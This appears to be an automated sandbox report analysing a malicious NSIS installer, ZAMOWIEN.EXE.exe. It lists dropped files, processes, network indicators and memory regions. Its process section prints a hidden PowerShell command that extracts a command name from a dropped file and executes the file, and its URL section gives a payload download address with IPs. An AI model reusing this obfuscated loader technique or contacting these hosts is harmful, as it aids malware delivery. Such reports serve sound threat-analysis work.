Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
ZAMOWIEN.EXE.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\Cloud Setting.ini
|
ASCII text, with CRLF line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ej0upirj.lcs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fq4gpvmn.ifd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlhp5dsk.keg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whacdxbn.skt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\deciliteren\afstnings\Krattet.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\deciliteren\afstnings\Maser52.kon
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb
|
ASCII text, with very long lines (3071), with CRLF, LF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\deciliteren\afstnings\Slagterknivene.Tre
|
ISO-8859 text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
|
"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binRefosWelwww.creditesimplebm.ro/tmp-image/
|
unknown
|
||
|
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.bin
|
109.73.128.91
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://www.corella.ro/
|
unknown
|
||
|
https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.bin=
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://ftp.rusticpensiune.ro
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ftp.rusticpensiune.ro
|
185.146.87.128
|
|
|
|
corella.ro
|
109.73.128.91
|
||
|
www.corella.ro
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.146.87.128
|
ftp.rusticpensiune.ro
|
Romania
|
|
|
|
109.73.128.91
|
corella.ro
|
Spain
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
22CE1000
|
trusted library allocation
|
page read and write
|
|
|
|
C60C000
|
direct allocation
|
page execute and read and write
|
|
|
|
22D27000
|
trusted library allocation
|
page read and write
|
|
|
|
4A33000
|
trusted library allocation
|
page execute and read and write
|
||
|
25190000
|
trusted library allocation
|
page read and write
|
||
|
8916000
|
heap
|
page read and write
|
||
|
77D4000
|
heap
|
page read and write
|
||
|
7756000
|
heap
|
page read and write
|
||
|
92FE000
|
stack
|
page read and write
|
||
|
22D45000
|
trusted library allocation
|
page read and write
|
||
|
353000
|
trusted library allocation
|
page execute and read and write
|
||
|
9360000
|
direct allocation
|
page execute and read and write
|
||
|
8520000
|
trusted library allocation
|
page read and write
|
||
|
84F4000
|
stack
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
4FEE000
|
stack
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
502E000
|
stack
|
page read and write
|
||
|
3A70000
|
remote allocation
|
page execute and read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
22D35000
|
trusted library allocation
|
page read and write
|
||
|
704E0000
|
unkown
|
page readonly
|
||
|
506A000
|
stack
|
page read and write
|
||
|
704FD000
|
unkown
|
page read and write
|
||
|
2297E000
|
stack
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
253C0000
|
trusted library allocation
|
page read and write
|
||
|
24CF4000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
8B12000
|
trusted library allocation
|
page read and write
|
||
|
4B10000
|
heap
|
page readonly
|
||
|
37A000
|
trusted library allocation
|
page execute and read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
253E0000
|
trusted library allocation
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
8860000
|
trusted library allocation
|
page read and write
|
||
|
AFE000
|
heap
|
page read and write
|
||
|
7370000
|
direct allocation
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
22940000
|
remote allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
7A0000
|
unkown
|
page read and write
|
||
|
8867000
|
trusted library allocation
|
page read and write
|
||
|
340000
|
trusted library allocation
|
page read and write
|
||
|
24FB9000
|
trusted library allocation
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
24D16000
|
heap
|
page read and write
|
||
|
712D000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
6258000
|
trusted library allocation
|
page read and write
|
||
|
253E0000
|
trusted library allocation
|
page read and write
|
||
|
7417000
|
heap
|
page read and write
|
||
|
AFA000
|
heap
|
page read and write
|
||
|
4C27000
|
heap
|
page read and write
|
||
|
25070000
|
trusted library allocation
|
page read and write
|
||
|
5112000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
direct allocation
|
page read and write
|
||
|
385000
|
trusted library allocation
|
page execute and read and write
|
||
|
25080000
|
trusted library allocation
|
page read and write
|
||
|
704FD000
|
unkown
|
page read and write
|
||
|
22AFE000
|
stack
|
page read and write
|
||
|
8B50000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
229E0000
|
direct allocation
|
page read and write
|
||
|
409000
|
unkown
|
page read and write
|
||
|
22AAE000
|
stack
|
page read and write
|
||
|
25090000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
71D0000
|
direct allocation
|
page read and write
|
||
|
57BF000
|
trusted library allocation
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
22CD0000
|
heap
|
page execute and read and write
|
||
|
86B5000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
heap
|
page read and write
|
||
|
704E1000
|
unkown
|
page execute read
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
7245000
|
heap
|
page execute and read and write
|
||
|
2276D000
|
stack
|
page read and write
|
||
|
72B000
|
heap
|
page read and write
|
||
|
226ED000
|
stack
|
page read and write
|
||
|
57B5000
|
trusted library allocation
|
page read and write
|
||
|
25080000
|
trusted library allocation
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
24D82000
|
heap
|
page read and write
|
||
|
4A34000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
7622000
|
heap
|
page read and write
|
||
|
9350000
|
direct allocation
|
page execute and read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
2507E000
|
trusted library allocation
|
page read and write
|
||
|
2FC6000
|
heap
|
page read and write
|
||
|
4EDE000
|
stack
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
5205000
|
trusted library allocation
|
page read and write
|
||
|
7B0000
|
direct allocation
|
page read and write
|
||
|
25410000
|
trusted library allocation
|
page read and write
|
||
|
22A68000
|
stack
|
page read and write
|
||
|
4B89000
|
heap
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
25070000
|
trusted library allocation
|
page read and write
|
||
|
898E000
|
heap
|
page read and write
|
||
|
8500000
|
heap
|
page read and write
|
||
|
24E20000
|
trusted library allocation
|
page read and write
|
||
|
6119000
|
trusted library allocation
|
page read and write
|
||
|
88B0000
|
trusted library allocation
|
page read and write
|
||
|
CEF000
|
stack
|
page read and write
|
||
|
8530000
|
trusted library allocation
|
page read and write
|
||
|
2289D000
|
stack
|
page read and write
|
||
|
933D000
|
stack
|
page read and write
|
||
|
4A40000
|
trusted library allocation
|
page read and write
|
||
|
71C0000
|
direct allocation
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
250A0000
|
trusted library allocation
|
page read and write
|
||
|
6F2000
|
heap
|
page read and write
|
||
|
22C3D000
|
stack
|
page read and write
|
||
|
7200000
|
direct allocation
|
page read and write
|
||
|
25400000
|
trusted library allocation
|
page read and write
|
||
|
71F0000
|
direct allocation
|
page read and write
|
||
|
25077000
|
trusted library allocation
|
page read and write
|
||
|
4B0E000
|
stack
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
253C0000
|
trusted library allocation
|
page read and write
|
||
|
776D000
|
heap
|
page read and write
|
||
|
250A0000
|
trusted library allocation
|
page read and write
|
||
|
2500000
|
heap
|
page read and write
|
||
|
73B0000
|
direct allocation
|
page read and write
|
||
|
36D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24D51000
|
heap
|
page read and write
|
||
|
390000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B6C000
|
stack
|
page read and write
|
||
|
8973000
|
heap
|
page read and write
|
||
|
25180000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
704FF000
|
unkown
|
page readonly
|
||
|
704F6000
|
unkown
|
page readonly
|
||
|
22C6A000
|
trusted library allocation
|
page read and write
|
||
|
250D0000
|
trusted library allocation
|
page read and write
|
||
|
773000
|
heap
|
page read and write
|
||
|
387000
|
trusted library allocation
|
page execute and read and write
|
||
|
253E0000
|
trusted library allocation
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
8655000
|
trusted library allocation
|
page read and write
|
||
|
8910000
|
heap
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
B4B000
|
heap
|
page read and write
|
||
|
57B7000
|
trusted library allocation
|
page read and write
|
||
|
71A0000
|
direct allocation
|
page read and write
|
||
|
23CE9000
|
trusted library allocation
|
page read and write
|
||
|
B52000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
25050000
|
trusted library allocation
|
page read and write
|
||
|
8945000
|
heap
|
page read and write
|
||
|
4A49000
|
trusted library allocation
|
page read and write
|
||
|
25050000
|
trusted library allocation
|
page read and write
|
||
|
22C71000
|
trusted library allocation
|
page read and write
|
||
|
22B68000
|
trusted library allocation
|
page read and write
|
||
|
2517E000
|
stack
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
25050000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E0000
|
direct allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
321E000
|
stack
|
page read and write
|
||
|
2580000
|
heap
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
8D00000
|
heap
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
704E1000
|
unkown
|
page execute read
|
||
|
6D1C000
|
remote allocation
|
page execute and read and write
|
||
|
2E5C000
|
stack
|
page read and write
|
||
|
861F000
|
stack
|
page read and write
|
||
|
409000
|
unkown
|
page write copy
|
||
|
22C5B000
|
trusted library allocation
|
page read and write
|
||
|
2272E000
|
stack
|
page read and write
|
||
|
227AC000
|
stack
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
7540000
|
direct allocation
|
page read and write
|
||
|
859E000
|
stack
|
page read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
24E20000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
30AD000
|
heap
|
page read and write
|
||
|
7B1000
|
unkown
|
page read and write
|
||
|
9E0C000
|
direct allocation
|
page execute and read and write
|
||
|
24E32000
|
trusted library allocation
|
page read and write
|
||
|
7766000
|
heap
|
page read and write
|
||
|
72E000
|
heap
|
page read and write
|
||
|
2266E000
|
stack
|
page read and write
|
||
|
22C82000
|
trusted library allocation
|
page read and write
|
||
|
7180000
|
direct allocation
|
page read and write
|
||
|
4A5A000
|
trusted library allocation
|
page execute and read and write
|
||
|
25070000
|
trusted library allocation
|
page read and write
|
||
|
8A80000
|
heap
|
page read and write
|
||
|
24E20000
|
trusted library allocation
|
page read and write
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
73C0000
|
direct allocation
|
page read and write
|
||
|
22A2A000
|
stack
|
page read and write
|
||
|
22C50000
|
trusted library allocation
|
page read and write
|
||
|
24D9E000
|
heap
|
page read and write
|
||
|
7A3E000
|
stack
|
page read and write
|
||
|
7A0000
|
direct allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
24E50000
|
heap
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
3250000
|
trusted library section
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
2504000
|
heap
|
page read and write
|
||
|
227D0000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
7410000
|
heap
|
page read and write
|
||
|
303C000
|
heap
|
page read and write
|
||
|
881E000
|
stack
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
4A60000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
229BF000
|
stack
|
page read and write
|
||
|
7390000
|
direct allocation
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
350000
|
trusted library allocation
|
page read and write
|
||
|
4A62000
|
trusted library allocation
|
page read and write
|
||
|
24E51000
|
heap
|
page read and write
|
||
|
25190000
|
trusted library allocation
|
page execute and read and write
|
||
|
891C000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
4A50000
|
trusted library allocation
|
page read and write
|
||
|
250C0000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
30CB000
|
heap
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
22CB0000
|
trusted library allocation
|
page read and write
|
||
|
25050000
|
trusted library allocation
|
page read and write
|
||
|
250A0000
|
trusted library allocation
|
page read and write
|
||
|
704E0000
|
unkown
|
page readonly
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
24F8C000
|
stack
|
page read and write
|
||
|
6AA000
|
heap
|
page read and write
|
||
|
22940000
|
remote allocation
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
B20C000
|
direct allocation
|
page execute and read and write
|
||
|
4FAE000
|
stack
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
2A4E000
|
stack
|
page read and write
|
||
|
4A80000
|
trusted library allocation
|
page read and write
|
||
|
3270000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
trusted library allocation
|
page read and write
|
||
|
7920000
|
trusted library allocation
|
page read and write
|
||
|
25420000
|
trusted library allocation
|
page read and write
|
||
|
22C62000
|
trusted library allocation
|
page read and write
|
||
|
22C76000
|
trusted library allocation
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page execute and read and write
|
||
|
25070000
|
trusted library allocation
|
page read and write
|
||
|
85D0000
|
heap
|
page read and write
|
||
|
22B3C000
|
stack
|
page read and write
|
||
|
7830000
|
heap
|
page execute and read and write
|
||
|
885E000
|
stack
|
page read and write
|
||
|
407000
|
unkown
|
page readonly
|
||
|
2285F000
|
stack
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page read and write
|
||
|
22C5E000
|
trusted library allocation
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
24FC0000
|
heap
|
page execute and read and write
|
||
|
3288000
|
heap
|
page read and write
|
||
|
6249000
|
trusted library allocation
|
page read and write
|
||
|
2513E000
|
stack
|
page read and write
|
||
|
85A0000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
71B000
|
heap
|
page read and write
|
||
|
93E000
|
stack
|
page read and write
|
||
|
721000
|
heap
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page read and write
|
||
|
2509D000
|
stack
|
page read and write
|
||
|
70F000
|
heap
|
page read and write
|
||
|
4BE0000
|
trusted library allocation
|
page read and write
|
||
|
3018000
|
heap
|
page read and write
|
||
|
24CE000
|
stack
|
page read and write
|
||
|
7D7000
|
heap
|
page read and write
|
||
|
2F9E000
|
stack
|
page read and write
|
||
|
88C0000
|
trusted library allocation
|
page read and write
|
||
|
2281E000
|
stack
|
page read and write
|
||
|
25050000
|
trusted library allocation
|
page read and write
|
||
|
229D0000
|
direct allocation
|
page read and write
|
||
|
25070000
|
trusted library allocation
|
page read and write
|
||
|
85B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D5000
|
heap
|
page read and write
|
||
|
23D44000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
715000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
22B50000
|
heap
|
page read and write
|
||
|
250A0000
|
trusted library allocation
|
page read and write
|
||
|
631C000
|
remote allocation
|
page execute and read and write
|
||
|
73A0000
|
direct allocation
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
24CF0000
|
heap
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
38B000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C0000
|
direct allocation
|
page read and write
|
||
|
780000
|
unkown
|
page read and write
|
||
|
22CC0000
|
trusted library allocation
|
page read and write
|
||
|
22C6E000
|
trusted library allocation
|
page read and write
|
||
|
382000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
360000
|
trusted library allocation
|
page read and write
|
||
|
791E000
|
stack
|
page read and write
|
||
|
99E000
|
stack
|
page read and write
|
||
|
22CC0000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
625E000
|
trusted library allocation
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
724000
|
heap
|
page read and write
|
||
|
22CC0000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
B2B000
|
heap
|
page read and write
|
||
|
22C7D000
|
trusted library allocation
|
page read and write
|
||
|
7A7D000
|
stack
|
page read and write
|
||
|
704FF000
|
unkown
|
page readonly
|
||
|
2550000
|
heap
|
page read and write
|
||
|
7220000
|
direct allocation
|
page read and write
|
||
|
25190000
|
trusted library allocation
|
page read and write
|
||
|
B2B000
|
heap
|
page read and write
|
||
|
4B28000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
226AE000
|
stack
|
page read and write
|
||
|
253BE000
|
stack
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
25050000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
354000
|
trusted library allocation
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
62DC000
|
trusted library allocation
|
page read and write
|
||
|
591C000
|
remote allocation
|
page execute and read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
704F6000
|
unkown
|
page readonly
|
||
|
22CB0000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
4F1C000
|
remote allocation
|
page execute and read and write
|
||
|
24D27000
|
heap
|
page read and write
|
||
|
2B4F000
|
stack
|
page read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
253F0000
|
trusted library allocation
|
page read and write
|
||
|
7A6000
|
unkown
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
2F5E000
|
stack
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
24D93000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
3102000
|
heap
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
3B1C000
|
remote allocation
|
page execute and read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
22C40000
|
trusted library allocation
|
page read and write
|
||
|
75BE000
|
stack
|
page read and write
|
||
|
7380000
|
direct allocation
|
page read and write
|
||
|
77A000
|
unkown
|
page read and write
|
||
|
25190000
|
trusted library allocation
|
page read and write
|
||
|
25070000
|
trusted library allocation
|
page read and write
|
||
|
451C000
|
remote allocation
|
page execute and read and write
|
||
|
8680000
|
trusted library allocation
|
page read and write
|
||
|
253C0000
|
trusted library allocation
|
page read and write
|
||
|
79FE000
|
stack
|
page read and write
|
||
|
B2F000
|
heap
|
page read and write
|
||
|
3260000
|
trusted library section
|
page read and write
|
||
|
250A0000
|
trusted library allocation
|
page read and write
|
||
|
610000
|
heap
|
page readonly
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
24E40000
|
heap
|
page read and write
|
||
|
8870000
|
trusted library allocation
|
page read and write
|
||
|
25190000
|
trusted library allocation
|
page read and write
|
||
|
B28000
|
heap
|
page read and write
|
||
|
7240000
|
heap
|
page execute and read and write
|
||
|
2605000
|
heap
|
page read and write
|
||
|
407000
|
unkown
|
page readonly
|
||
|
25190000
|
trusted library allocation
|
page read and write
|
||
|
73F0000
|
heap
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
250B0000
|
trusted library allocation
|
page read and write
|
||
|
50B1000
|
trusted library allocation
|
page read and write
|
||
|
4ACE000
|
stack
|
page read and write
|
||
|
8B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7380000
|
direct allocation
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
72E000
|
heap
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
25080000
|
trusted library allocation
|
page read and write
|
||
|
7F270000
|
trusted library allocation
|
page execute and read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
6240000
|
trusted library allocation
|
page read and write
|
||
|
376000
|
trusted library allocation
|
page execute and read and write
|
||
|
784000
|
unkown
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
B52000
|
heap
|
page read and write
|
||
|
501C000
|
stack
|
page read and write
|
||
|
8930000
|
heap
|
page read and write
|
||
|
8985000
|
heap
|
page read and write
|
||
|
23CE1000
|
trusted library allocation
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
7B3000
|
unkown
|
page readonly
|
||
|
22D25000
|
trusted library allocation
|
page read and write
|
||
|
25190000
|
trusted library allocation
|
page read and write
|
||
|
22C56000
|
trusted library allocation
|
page read and write
|
||
|
897B000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
60D9000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
BC0C000
|
direct allocation
|
page execute and read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
85C0000
|
trusted library allocation
|
page read and write
|
||
|
940C000
|
direct allocation
|
page execute and read and write
|
||
|
25070000
|
trusted library allocation
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
75FE000
|
stack
|
page read and write
|
||
|
50A0000
|
heap
|
page execute and read and write
|
||
|
7A8000
|
unkown
|
page read and write
|
||
|
8918000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
4B80000
|
heap
|
page read and write
|
||
|
4A3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
253D0000
|
trusted library allocation
|
page read and write
|
||
|
2560000
|
heap
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
7F6C8000
|
trusted library allocation
|
page execute and read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
8510000
|
trusted library allocation
|
page execute and read and write
|
||
|
